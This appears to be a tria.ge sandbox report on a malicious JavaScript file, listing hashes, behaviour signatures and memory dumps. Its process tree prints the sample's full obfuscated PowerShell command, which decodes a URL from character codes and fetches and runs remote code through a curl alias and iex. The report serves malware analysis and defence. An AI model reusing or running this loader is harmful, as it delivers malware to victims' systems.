Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Notice_5595225.js

windows7-x64

10

Notice_5595225.js

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/08/2023, 15:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Notice_5595225.js

  • Size

    523KB

  • MD5

    8831383636fc14d3fa37b70dd9573719

  • SHA1

    9c9dbeee2a2a17a73b7dc7d29a00323d9bd73ca2

  • SHA256

    bf8e971d4e6c0628de96a3976e704dfdeca56dc5a53b0153bee0a9dc50808625

  • SHA512

    a080168a704548a1a695377cf8ddfe84faf54279e7e8001749933d40939a4a0544636867d81b41addaa4988cd54de228d697357bf8b9883f2f309032fa4eae33

  • SSDEEP

    3072:Yzmzxnu80Ol/RiV4VN4KjqNUGkPmQnserYWjwfhE9MIuz70wle3l9:PJ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_5595225.js
    1⤵
      PID:3544
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell @(3984,4004,3985,3999,4005,3984,3929,3999,3994,3995,3930,3932,3929,3995,3987,3995,3946,3987,3980,3998,3987,3944)|foreach{$urwesicqvlpo=$urwesicqvlpo+[char]($_-3883);$qlrneyhtoaxj=$urwesicqvlpo};$wojyck='l'; new-alias tixxs cur$wojyck;$afswe=('sduzu',$qlrneyhtoaxj);.$([char](8892-8787)+'ex')(tixxs -useb "$afswe[1]")
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell @(3984,4004,3985,3999,4005,3984,3929,3999,3994,3995,3930,3932,3929,3995,3987,3995,3946,3987,3980,3998,3987,3944)|foreach{$urwesicqvlpo=$urwesicqvlpo+[char]($_-3883);$qlrneyhtoaxj=$urwesicqvlpo};$wojyck='l'; new-alias tixxs cur$wojyck;$afswe=('sduzu',$qlrneyhtoaxj);.$([char](8892-8787)+'ex')(tixxs -useb $afswe[1])
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:452

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwdyqjxu.l24.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/452-133-0x000002C1C1ED0000-0x000002C1C1EF2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/452-143-0x00007FFC0A060000-0x00007FFC0AB21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/452-144-0x000002C1C1F90000-0x000002C1C1FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/452-145-0x000002C1C1F90000-0x000002C1C1FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/452-148-0x00007FFC0A060000-0x00007FFC0AB21000-memory.dmp

      Filesize

      10.8MB

      Download